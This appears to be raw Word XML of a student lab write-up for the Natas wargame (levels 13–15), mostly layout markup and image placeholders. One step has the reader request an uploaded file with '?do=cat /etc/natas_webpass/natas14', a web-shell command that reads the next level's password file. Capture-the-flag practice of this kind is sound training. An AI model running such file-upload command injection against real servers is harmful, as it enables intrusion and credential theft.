      </w:tblGrid>
      <w:tr w:rsidR="00C41BEC" w14:paraId="3D3D5161" w14:textId="77777777" w:rsidTr="005D1F08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="164702A6" w14:textId="34B719C9" w:rsidR="00C41BEC" w:rsidRDefault="005D1F08" w:rsidP="00C41BEC">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F650D8E" wp14:editId="609EEE74">
                  <wp:extent cx="5943600" cy="3207385"/>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07385"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="318BCD22" w14:textId="77777777" w:rsidR="00C41BEC" w:rsidRDefault="00C41BEC" w:rsidP="00C41BEC">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048732A4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AE740D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="727874C1" wp14:editId="1223FB7D">
            <wp:extent cx="5943600" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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43600" cy="2057400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6F296" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="1BB5327F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0973A921" wp14:editId="352C0BBD">
            <wp:extent cx="5943600" cy="406400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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406400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EE8FD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="75CB26B3" wp14:editId="0D98A774">
            <wp:extent cx="5943600" cy="1460500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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43600" cy="1460500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CE3E4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="4C5F5B39" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Success! The file was uploaded. Now all we need to do is repeat th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">e process we did in the last lab for task </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12-13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B78CC" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6195D5F1" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comment out the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>post request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line 10) and uncomment the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>get request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line 8). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D625B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to match the upload location and append it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>natas_webpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/natas14'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F32043" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check the screenshot below (upload location is different) for confirmation of parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F299710" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-95" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB3A7D" w14:paraId="3966DCE2" w14:textId="77777777" w:rsidTr="00317D4D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9445" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60C9D114" w14:textId="42226FCD" w:rsidR="00FB3A7D" w:rsidRDefault="00317D4D" w:rsidP="00FB3A7D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E27D4FA" wp14:editId="39FD0677">
                  <wp:extent cx="5943600" cy="3219450"/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67B50EDF" w14:textId="77777777" w:rsidR="00FB3A7D" w:rsidRDefault="00FB3A7D" w:rsidP="00FB3A7D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699509CA" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="15A58771" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="345CBB86" wp14:editId="6492C7DD">
            <wp:extent cx="5943600" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="276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5943600" cy="1689100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49B399" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="487BBB3D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6E0A4E5C" wp14:editId="1C6D20E7">
            <wp:extent cx="3476625" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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3476625" cy="1123950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAF803" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="7E9977A8" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t>Voila! Now we have the password for natas14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60906FCD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201DEA69" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task 2: 14-15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B676F1" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="10FDC941" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">As completed in previous tasks, we want to change the Python code to match our new parameters. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E83F3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="74B8EA19" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Take a close look at the screensh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ot below to check if you have all the parameters correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9C5C7" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the file as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>natas14-15.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D255782" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-95" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9445"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C67FD" w14:paraId="347CF9BB" w14:textId="77777777" w:rsidTr="00B82481">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9445" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7286B28F" w14:textId="230883FA" w:rsidR="002C67FD" w:rsidRDefault="00B82481" w:rsidP="002C67FD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18BBD1C8" wp14:editId="68D41AEC">
                  <wp:extent cx="5943600" cy="3228975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14B45FDF" w14:textId="77777777" w:rsidR="002C67FD" w:rsidRDefault="002C67FD" w:rsidP="002C67FD">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9AE594" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="2D661FF4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2193EC9A" wp14:editId="42E889A4">
            <wp:extent cx="5943600" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5943600" cy="2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4AE87" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="7D08578B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">There is not much data in the build output on the main page. Let’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44135BEB" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="35BA19EB" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the natas14-15 tab, append the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index-source.html</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F811427" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-95" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9445"/>
      </w:tblGrid>
      <w:tr w:rsidR="001074AB" w14:paraId="68F2930D" w14:textId="77777777" w:rsidTr="005E5BE8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9445" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F5708A0" w14:textId="698220B3" w:rsidR="001074AB" w:rsidRDefault="005E5BE8" w:rsidP="001074AB">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402D55B5" wp14:editId="07C5FD7E">
                  <wp:extent cx="5943600" cy="3222625"/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DAB04CD" w14:textId="77777777" w:rsidR="001074AB" w:rsidRDefault="001074AB" w:rsidP="001074AB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EEF675" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6DF52D2B" wp14:editId="71D2CD98">
            <wp:extent cx="5943600" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5943600" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71BB9F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="6537A9C9" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This is very difficult to read. Let’s use HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Deentitize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and delete all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags with find and replace by doing the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23797ADC" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="066B008C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In the b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>uild output tab, pres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CTRL+SHIFT+P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringEncode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deentitze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Click on this option.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55895" w14:paraId="537BA7C3" w14:textId="77777777" w:rsidTr="00C55895">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A810A79" w14:textId="47E1C30A" w:rsidR="00C55895" w:rsidRDefault="00C4132D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B044454" wp14:editId="30F1D31A">
                  <wp:extent cx="5943600" cy="322580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inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5200BE4B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="01912F5F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3F262D8A" wp14:editId="36ADE192">
            <wp:extent cx="2981325" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="276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2981325" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D3071C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="47B38118" wp14:editId="4C6C5481">
            <wp:extent cx="5943600" cy="3949700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5943600" cy="3949700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC48E78" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629A79F8" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CTRL+H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the find bar and then hit the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">replace all </w:t>
      </w:r>
      <w:r>
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45F9FB" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
